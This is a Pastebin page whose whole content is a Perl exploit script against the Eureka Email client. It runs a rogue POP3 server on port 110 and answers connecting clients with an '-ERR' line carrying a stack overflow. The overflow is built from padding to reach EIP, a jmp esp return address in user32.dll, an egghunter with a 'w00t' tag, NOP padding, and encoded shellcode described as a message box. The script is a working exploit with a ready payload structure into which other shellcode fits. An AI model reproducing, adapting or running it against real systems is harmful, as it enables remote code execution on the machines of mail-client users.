Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- use Socket;
- #fill out the local IP or hostname
- #which is used by Eureka EMail as POP3 server
- #note : must be exact match !
- my $localserver = "10.0.1.6";
- #calculate offset to EIP
- my $junk = "A" x (723 - length($localserver));
- my $ret = pack('V',0x7E47BCAF); #jmp esp from user32.dll
- my $padding = "\x90" x 300;
- my $egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
- "w00t". #this is the marker/tag
- "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
- # xsploited security msgbox! shellcode :D
- my $shellcode = ("\x33\xc9\xba\x8d\x4c\x87\x06\xdb\xde\xd9\x74\x24\xf4\xb1\x45".
- "\x5f\x31\x57\x13\x03\x57\x13\x83\xef\xfc\xe2\x78\x95\x6c\x9d".
- "\x5b\x52\x57\x56\x6a\x49\x25\xe1\xbd\xa4\x2e\x85\xcc\x06\x24".
- "\xef\x22\xec\x4c\x0c\xb1\xb4\xb8\xa7\xbb\x18\x32\x81\x7b\x16".
- "\x5c\x9b\x88\xf1\x5d\xb2\x91\xe3\x3e\xbf\x01\xc0\x9a\x34\x9c".
- "\x34\x68\x1e\x36\x3d\x6f\x75\xcd\xf7\x77\x02\x8b\x27\x89\xff".
- "\xc8\x1c\xc0\x74\x3a\xd6\xd3\x64\x73\x17\xe2\xb8\x8f\x4b\x81".
- "\xf9\x1b\x93\x4b\x36\xee\x9a\x8c\x22\x04\xa7\x6e\x91\xcc\xad".
- "\x6f\x52\x56\x6a\x71\x8e\x00\xf9\x7d\x1b\x47\xa7\x61\x9a\xbc".
- "\xd3\x9e\x17\x43\x0c\x17\x63\x67\xd0\x49\xaf\xd5\xe0\xa0\xfb".
- "\x90\x14\x3b\xc1\xca\x58\x72\xc8\xe6\x37\x63\x4b\x09\x48\x8c".
- "\xfd\xb0\xb3\xc8\x80\xe2\x5e\x5d\xfa\x0e\xbb\xf0\xec\xa0\x3c".
- "\x0b\x13\x35\x87\xfc\x84\x29\x64\xdd\x15\xd9\x47\x2f\xb8\x7d".
- "\xc0\x3a\xb7\x18\x62\x4d\x6b\xc6\x88\xc4\x72\x50\x72\x83\x7e".
- "\xd5\x4e\x7c\xc4\x4d\xec\x30\x86\x0a\xed\xee\xa4\xfc\x6f\x10".
- "\xb7\x03\x07\xb6\x68\xdb\xf8\x2e\x0d\x68\x9c\xcd\xa5\xe1\x37".
- "\x66\x53\x95\xbf\xf5\xeb\x09\x71\x21\x83\x8d\x55\xd9\x1d\xce".
- "\xfe\x95\x64\x31\xa7\x3d\xf4\x44\x25\xd7\x92\xc2\xe9\x54\x06".
- "\x62\x85\xf3\xbc\x17\x31\x7c\x4e\xa7\xad\x4d\x79\xcf\x62\x8a".
- "\x6a\x46\x9b\xe3\x5e\x0a\x0f\x55\x0d\x55\x7f\x64\x71\xf9\x7f".
- "\xd2\x79");
- my $payload=$junk.$ret.$egghunter.$padding."w00tw00t".$shellcode;
- #set up listener on port 110
- my $port=110;
- my $proto=getprotobyname('tcp');
- socket(SERVER,PF_INET,SOCK_STREAM,$proto);
- my $paddr=sockaddr_in($port,INADDR_ANY);
- bind(SERVER,$paddr);
- listen(SERVER,SOMAXCONN);
- print "[+] Listening on tcp port 110 [POP3]... \n";
- print "[+] Configure Eureka Mail Client to connect to this host\n";
- my $client_addr;
- while($client_addr=accept(CLIENT,SERVER))
- {
- print "[+] Client connected, sending evil payload\n";
- while(1)
- {
- print CLIENT "-ERR ".$payload."\n";
- print " -> Sent ".length($payload)." bytes\n";
- }
- }
- close CLIENT;
- print "[+] Connection closed\n";
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement